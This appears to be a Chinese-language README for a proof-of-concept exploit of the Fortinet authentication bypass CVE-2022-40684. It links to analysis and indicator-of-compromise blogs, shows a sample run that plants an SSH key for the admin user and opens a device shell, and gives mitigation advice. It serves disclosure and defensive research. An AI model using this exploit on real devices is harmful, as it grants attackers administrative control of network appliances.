针对 Fortinet FortiOS、FortiProxy 和 FortiSwitchManager 设备的 CVE-2022-40684 漏洞概念验证。
该漏洞的技术根源分析可在我们的博客上找到: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
要分析 Fortinet 日志以获取入侵指标并了解如何启用更详细的日志,请参阅我们的 IOC 博客: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
此概念验证利用身份验证绕过漏洞为指定用户设置SSH密钥。
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
更新到最新版本或按照 Fortinet PSIRT 中的说明进行缓解。
本软件纯粹为学术研究和开发有效的防御技术而创建,除非得到明确授权,否则不应用于攻击系统。项目维护者不对软件的滥用承担任何责任。请负责任地使用。